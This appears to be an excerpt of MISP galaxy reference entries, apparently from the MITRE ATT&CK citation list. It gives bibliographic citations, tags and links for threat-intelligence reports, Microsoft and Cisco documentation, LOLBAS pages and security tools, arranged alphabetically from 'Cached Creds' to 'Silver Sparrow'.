
Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft Credential Manager store"

Table 12956. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store

Microsoft - Cached Creds

Microsoft. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Microsoft - Cached Creds"

Table 12957. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)

Kaspersky CactusPete Aug 2020

Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.

The tag is: misp-galaxy:references="Kaspersky CactusPete Aug 2020"

Table 12958. Table References

Links

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

ESET CaddyWiper March 2022

ESET. (2022, March 15). CaddyWiper: New wiper malware discovered in Ukraine. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="ESET CaddyWiper March 2022"

Table 12959. Table References

Links

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine

Cadet Blizzard emerges as novel threat actor

Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Cadet Blizzard emerges as novel threat actor"

Table 12960. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Cado Security Denonia

Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Cado Security Denonia"

Table 12961. Table References

Links

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

Caesars Scattered Spider September 13 2023

William Turton. (2023, September 13). Caesars Entertainment Paid Millions to Hackers in Attack. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Caesars Scattered Spider September 13 2023"

Table 12962. Table References

Links

https://www.bloomberg.com/news/articles/2023-09-13/caesars-entertainment-paid-millions-in-ransom-in-recent-attack

Securelist Calisto July 2018

Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.

The tag is: misp-galaxy:references="Securelist Calisto July 2018"

Table 12963. Table References

Links

https://securelist.com/calisto-trojan-for-macos/86543/

CERTFR-2023-CTI-009

CERT-FR. (2023, October 26). Campagnes d’attaques du mode opératoire APT28 depuis 2021. Retrieved October 26, 2023.

The tag is: misp-galaxy:references="CERTFR-2023-CTI-009"

Table 12964. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

FSI Andariel Campaign Rifle July 2017

FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="FSI Andariel Campaign Rifle July 2017"

Table 12965. Table References

Links

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do

KasperskyCarbanak

Kaspersky Lab’s Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.

The tag is: misp-galaxy:references="KasperskyCarbanak"

Table 12966. Table References

Links

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

Kaspersky Carbanak

Kaspersky Lab’s Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="Kaspersky Carbanak"

Table 12967. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

Forcepoint Carbanak Google C2

Griffin, N. (2017, January 17). CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL. Retrieved February 15, 2017.

The tag is: misp-galaxy:references="Forcepoint Carbanak Google C2"

Table 12968. Table References

Links

https://blogs.forcepoint.com/security-labs/carbanak-group-uses-google-malware-command-and-control

Trend Micro Carberp February 2014

Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020.

The tag is: misp-galaxy:references="Trend Micro Carberp February 2014"

Table 12969. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp

Prevx Carberp March 2011

Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Prevx Carberp March 2011"

Table 12970. Table References

Links

http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf

Trusteer Carberp October 2010

Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Trusteer Carberp October 2010"

Table 12971. Table References

Links

https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf

ESET Carbon Mar 2017

ESET. (2017, March 30). Carbon Paper: Peering into Turla’s second stage backdoor. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="ESET Carbon Mar 2017"

Table 12972. Table References

Links

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

CrowdStrike Carbon Spider August 2021

Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="CrowdStrike Carbon Spider August 2021"

Table 12973. Table References

Links

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

PaloAlto CardinalRat Apr 2017

Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="PaloAlto CardinalRat Apr 2017"

Table 12974. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

ESET Casbaneiro Oct 2019

ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="ESET Casbaneiro Oct 2019"

Table 12975. Table References

Links

https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/

Microsoft Catalog Files and Signatures April 2017

Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Catalog Files and Signatures April 2017"

Table 12976. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

Catch All Chrome Extension

Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Catch All Chrome Extension"

Table 12977. Table References

Links

https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/

https://threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/

Akamai JS

Katz, O. (2020, October 26). Catch Me if You Can—JavaScript Obfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Akamai JS"

Table 12978. Table References

Links

https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation

Categorisation_not_boundary

MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="Categorisation_not_boundary"

Table 12979. Table References

Links

https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/

CrowdStrike Flying Kitten

Dahl, M. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="CrowdStrike Flying Kitten"

Table 12980. Table References

Links

https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/

Telephone Attack Delivery

Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Telephone Attack Delivery"

Table 12981. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery

Tetra Defense Sodinokibi March 2020

Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Tetra Defense Sodinokibi March 2020"

Table 12982. Table References

Links

https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis

CarbonBlack RobbinHood May 2019

Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.

The tag is: misp-galaxy:references="CarbonBlack RobbinHood May 2019"

Table 12983. Table References

Links

https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/

Talos CCleanup 2017

Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.

The tag is: misp-galaxy:references="Talos CCleanup 2017"

Table 12984. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

Cdb.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cdb.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cdb.exe - LOLBAS Project"

Table 12985. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/

ESET PLEAD Malware July 2018

Cherepanov, A. (2018, July 9). Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET PLEAD Malware July 2018"

Table 12986. Table References

Links

https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/

Medium Certified Pre Owned

Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="Medium Certified Pre Owned"

Table 12987. Table References

Links

https://posts.specterops.io/certified-pre-owned-d95910965cd2

SpecterOps Certified Pre Owned

Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="SpecterOps Certified Pre Owned"

Table 12988. Table References

Links

https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf

GitHub Certify

HarmJ0y et al. (2021, June 9). Certify. Retrieved August 4, 2022.

The tag is: misp-galaxy:references="GitHub Certify"

Table 12989. Table References

Links

https://github.com/GhostPack/Certify/

CertOC.exe - LOLBAS Project

LOLBAS. (2021, October 7). CertOC.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CertOC.exe - LOLBAS Project"

Table 12990. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

CertReq.exe - LOLBAS Project

LOLBAS. (2020, July 7). CertReq.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CertReq.exe - LOLBAS Project"

Table 12991. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certreq/

GitHub CertStealer

TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub CertStealer"

Table 12992. Table References

Links

https://github.com/TheWover/CertStealer

TechNet Certutil

Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="TechNet Certutil"

Table 12993. Table References

Links

https://technet.microsoft.com/library/cc732443.aspx

LOLBAS Certutil

LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Certutil"

Table 12994. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

FireEye CFR Watering Hole 2012

Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="FireEye CFR Watering Hole 2012"

Table 12995. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Twitter Cglyer Status Update APT3 eml

Glyer, C. (2018, April 14). @cglyer Status Update. Retrieved October 11, 2018.

The tag is: misp-galaxy:references="Twitter Cglyer Status Update APT3 eml"

Table 12996. Table References

Links

https://twitter.com/cglyer/status/985311489782374400

Cybereason Chaes Nov 2020

Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.

The tag is: misp-galaxy:references="Cybereason Chaes Nov 2020"

Table 12997. Table References

Links

https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf

Symantec Chafer February 2018

Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="Symantec Chafer February 2018"

Table 12998. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

Securelist Remexi Jan 2019

Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Securelist Remexi Jan 2019"

Table 12999. Table References

Links

https://securelist.com/chafer-used-remexi-malware/89538/

change_rdp_port_conti

The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.

The tag is: misp-galaxy:references="change_rdp_port_conti"

Table 13000. Table References

Links

https://twitter.com/TheDFIRReport/status/1498657772254240768

Microsoft Change Normal Template

Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Microsoft Change Normal Template"

Table 13001. Table References

Links

https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea

Microsoft Change Default Programs

Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="Microsoft Change Default Programs"

Table 13002. Table References

Links

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

Chaos Stolen Backdoor

Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.

The tag is: misp-galaxy:references="Chaos Stolen Backdoor"

Table 13003. Table References

Links

http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/

Wardle Persistence Chapter

Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Wardle Persistence Chapter"

Table 13004. Table References

Links

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

cisco_deploy_rsa_keys

Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI. Retrieved March 27, 2023.

The tag is: misp-galaxy:references="cisco_deploy_rsa_keys"

Table 13005. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436

Wikipedia Character Encoding

Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Wikipedia Character Encoding"

Table 13006. Table References

Links

https://en.wikipedia.org/wiki/Character_encoding

ClearSky Charming Kitten Dec 2017

ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="ClearSky Charming Kitten Dec 2017"

Table 13007. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

Certfa Charming Kitten January 2021

Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.

The tag is: misp-galaxy:references="Certfa Charming Kitten January 2021"

Table 13008. Table References

Links

https://blog.certfa.com/posts/charming-kitten-christmas-gift/

Proofpoint TA2541 February 2022

Larson, S. and Wise, J. (2022, February 15). Charting TA2541’s Flight. Retrieved September 12, 2023.

The tag is: misp-galaxy:references="Proofpoint TA2541 February 2022"

Table 13009. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

JPCERT ChChes Feb 2017

Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="JPCERT ChChes Feb 2017"

Table 13010. Table References

Links

http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html

EclecticLightChecksonEXECodeSigning

Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.

The tag is: misp-galaxy:references="EclecticLightChecksonEXECodeSigning"

Table 13011. Table References

Links

https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/

Anomali MUSTANG PANDA October 2019

Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="Anomali MUSTANG PANDA October 2019"

Table 13012. Table References

Links

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

FireEye admin@338

FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.

The tag is: misp-galaxy:references="FireEye admin@338"

Table 13013. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

IronNet BlackTech Oct 2021

Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="IronNet BlackTech Oct 2021"

Table 13014. Table References

Links

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

Recorded Future RedEcho Feb 2021

Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Recorded Future RedEcho Feb 2021"

Table 13015. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

EFF China GitHub Attack

Budington, B. (2015, April 2). China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="EFF China GitHub Attack"

Table 13016. Table References

Links

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

PaloAlto 3102 Sept 2015

Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="PaloAlto 3102 Sept 2015"

Table 13017. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

ZScaler Hacking Team

Desai, D. (2015, August 14). Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="ZScaler Hacking Team"

Table 13018. Table References

Links

http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html

Hacker News LuckyMouse June 2018

Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Hacker News LuckyMouse June 2018"

Table 13019. Table References

Links

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

Dark Reading Codoso Feb 2015

Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Dark Reading Codoso Feb 2015"

Table 13020. Table References

Links

https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059

Recorded Future TAG-22 July 2021

INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.

The tag is: misp-galaxy:references="Recorded Future TAG-22 July 2021"

Table 13021. Table References

Links

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

Recorded Future Chinese Activity in Southeast Asia December 2021

Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Recorded Future Chinese Activity in Southeast Asia December 2021"

Table 13022. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf

Recorded Future REDDELTA July 2020

Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Recorded Future REDDELTA July 2020"

Table 13023. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

Github CHIPSEC

Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Github CHIPSEC"

Table 13024. Table References

Links

https://github.com/chipsec/chipsec

McAfee CHIPSEC Blog

Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.

The tag is: misp-galaxy:references="McAfee CHIPSEC Blog"

Table 13025. Table References

Links

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Chkrootkit Main

Murilo, N., Steding-Jessen, K. (2017, August 23). Chkrootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Chkrootkit Main"

Table 13026. Table References

Links

http://www.chkrootkit.org/

Azure AD Hybrid Identity

Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD Hybrid Identity"

Table 13027. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn

show_ssh_users_cmd_cisco

Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_ssh_users_cmd_cisco"

Table 13028. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html

Cisco IOS Shellcode

George Nosenko. (2015). Cisco IOS Shellcode: All-In-One. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Shellcode"

Table 13029. Table References

Links

http://2015.zeronights.org/assets/files/05-Nosenko.pdf

Cisco IOS Software Integrity Assurance - AAA

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - AAA"

Table 13030. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#38

Cisco IOS Software Integrity Assurance - Boot Information

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Boot Information"

Table 13031. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#26

Cisco IOS Software Integrity Assurance - Change Control

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Change Control"

Table 13032. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#31

Cisco IOS Software Integrity Assurance - Image File Verification

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Image File Verification"

Table 13033. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Cisco IOS Software Integrity Assurance - Run-Time Memory Verification

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Run-Time Memory Verification"

Table 13034. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

Cisco IOS Software Integrity Assurance - Command History

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Command History"

Table 13035. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

Cisco IOS Software Integrity Assurance - Credentials Management

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Credentials Management"

Table 13036. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#40

Cisco IOS Software Integrity Assurance - Deploy Signed IOS

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Deploy Signed IOS"

Table 13037. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#34

Cisco IOS Software Integrity Assurance - Image File Integrity

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Image File Integrity"

Table 13038. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#30

Cisco IOS Software Integrity Assurance - Secure Boot

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - Secure Boot"

Table 13039. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#35

Cisco IOS Software Integrity Assurance - TACACS

Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco IOS Software Integrity Assurance - TACACS"

Table 13040. Table References

Links

https://tools.cisco.com/security/center/resources/integrity_assurance.html#39

Cisco Traffic Mirroring

Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Traffic Mirroring"

Table 13041. Table References

Links

https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html

Talos - Cisco Attack 2022

Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.

The tag is: misp-galaxy:references="Talos - Cisco Attack 2022"

Table 13042. Table References

Links

https://blog.talosintelligence.com/recent-cyber-attack/

Citrix Bulletin CVE-2023-3519

Citrix. (2023, July 18). Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467. Retrieved July 24, 2023.

The tag is: misp-galaxy:references="Citrix Bulletin CVE-2023-3519"

Table 13043. Table References

Links

https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467

Malwarebytes Citrix Bleed November 24 2023

Pieter Arntz. (2023, November 24). Citrix Bleed widely exploited, warn government agencies. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="Malwarebytes Citrix Bleed November 24 2023"

Table 13044. Table References

Links

https://www.malwarebytes.com/blog/news/2023/11/citrix-bleed-widely-exploitated-warn-government-agencies

Talent-Jump Clambling February 2020

Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Talent-Jump Clambling February 2020"

Table 13045. Table References

Links

https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/

FireEye Clandestine Fox Part 2

Scott, M. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Fox Part 2"

Table 13046. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

Microsoft Clear-EventLog

Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft Clear-EventLog"

Table 13047. Table References

Links

https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog

Clearing quarantine attribute

Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Clearing quarantine attribute"

Table 13048. Table References

Links

https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/

NPPSPY - Huntress

Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY - Huntress"

Table 13049. Table References

Links

https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy

CL_Invocation.ps1 - LOLBAS Project

LOLBAS. (2018, May 25). CL_Invocation.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_Invocation.ps1 - LOLBAS Project"

Table 13050. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/

clip_win_server

Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.

The tag is: misp-galaxy:references="clip_win_server"

Table 13051. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip

Red Canary Silver Sparrow Feb2021

Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.
